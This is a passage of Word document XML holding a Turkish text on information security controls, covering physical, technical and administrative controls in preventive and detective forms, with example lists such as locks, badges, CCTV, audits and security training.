        <w:t>Fiziksel, teknik ve idari kontrollerle çakışan bu sorunlar nedeniyle caydırıcı, düzeltici ve kurtarma kontrolleri bu bölümde daha fazla tartışılmamaktadır. Bunun yerine, üç ana kategorideki önleyici ve dedektif kontroller incelenmiştir.</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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Physical Controls(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fiziksel Kontroller)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fiziksel güvenlik; kilitlerin, güvenlik görevlilerinin, rozetlerin, alarmların kullanılmasıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ve bilgisayarlara, ilgili ekipmanlara (tesisler dahil) ve işleme tesisinin kendisine erişimi kontrol etmeye yönelik benzer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ek olarak, bilgisayarların, ilgili ekipmanların ve bunların içeriklerinin casusluk, hırsızlık ve tahribat veya kaza, yangın veya doğal afet (örneğin, sel ve depremler) nedeniyle oluşabilecek hasarlardan korunması için önlemler alınması gerekmektedir.</w:t>
      </w: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r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Önleyici Fiziksel Kontroller</w:t>
      </w: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Pr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yetkili olmayan personelin bilgi işlem olanaklarına girmesini engellemek (yani bilgisayar kaynaklarını barındıran yerler, yardımcı programları, bilgisayar basılı kopyalarını ve girdi veri ortamlarını) önlemek ve doğal afetlere karşı korunmaya yardımcı olmak için önleyici fiziksel kontroller kullanılır. Bu kontrollerin örnekleri arasında şunlar bulunur:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Dosyaları ve belgeleri yedekleyin</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Çitler</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Güvenlik görevlileri</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Rozet sistemleri</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Çift Kapılı Sistemler</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Kilitler ve anahtarlar</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Yedek güç</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Biyometrik erişim kontrolleri</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Yer seçimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• İtfaiyeciler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE511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Pr="000D75BE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dedektif Fiziksel Kontroller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000D75BE"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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dedektif fiziksel kontroller, koruyucu hizmetler personelini, fiziksel güvenlik önlemlerinin ihlal edildiği konusunda uyarmaktadır. Bu kontrollerin örnekleri arasında şunlar bulunur:</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0D75BE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Hareket dedektörleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000D75BE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Duman ve yangın dedektörleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000D75BE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Kapalı devre televizyon monitörleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Sensörler ve alarmlar</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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000D75BE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dedektif Teknik Kontroller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000D75BE"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br/>
      </w:r>
      <w:r w:rsidRPr="000D75BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dedektif teknik kontroller personeli ihlallere karşı uyarmakta veya önleyici teknik ihlallerine teşebbüs etmektedir. Kontroller. Bunlara örnek olarak, takip eden bölümlerde ele alınan denetim izleri ve izinsiz giriş tespit uzman sistemleri dahildir.</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r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İdari Kontroller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">İdari veya personel güvenliği, bilgi işlem kaynakları için kabul edilebilir bir koruma düzeyi sağlamak üzere oluşturulan yönetim kısıtlamaları, operasyonel prosedürler, hesap verebilirlik prosedürleri ve tamamlayıcı idari kontrollerden oluşur. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ayrıca, idari kontroller, bilgi işlem kaynaklarına erişimi olan tüm personelin gerekli yetkilere sahip olmasını sağlamak ve uygun güvenlik izinleri.</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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Önleyici İdari Kontroller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Önleyici idari kontroller, kişilerin davranışlarını kontrol etmede personel odaklı tekniklerdir. .Bilgi işlem verilerinin ve programların gizliliğini, bütünlüğünü ve kullanılabilirliğini sağlamak..Önleyici örnekleri idari kontroller şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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br/>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">• Güvenlik bilinci ve teknik eğitim </w:t>
      </w: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DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">• Görevlerinin ayrılması </w:t>
      </w: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DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>• Çalışanları işe alma ve işten çıkarma prosedürleri</w:t>
      </w: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DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">• Güvenlik politikaları ve prosedürleri </w:t>
      </w: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DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">• Denetim </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">• Afet kurtarma, acil durum ve acil durum planları </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>• Bilgisayar erişimi için kullanıcı kaydı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dedektif İdari Kontroller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A"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br/>
      </w:r>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Güvenlik politikaları ve prosedürlerine ne kadar iyi uyulduğunu belirlemek için dedektif idari kontroller kullanılır sahtekarlığı saptamak ve kabul edilemez bir güvenlik riski taşıyan kişilerin istihdam edilmesinden kaçınmak. Bu tip kontrolün içeriği:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Güvenlik incelemeleri ve denetimleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Performans değerlendirmeleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00DD553A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD553A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>• Gerekli tatiller</w:t>
      </w:r>
    </w:p>
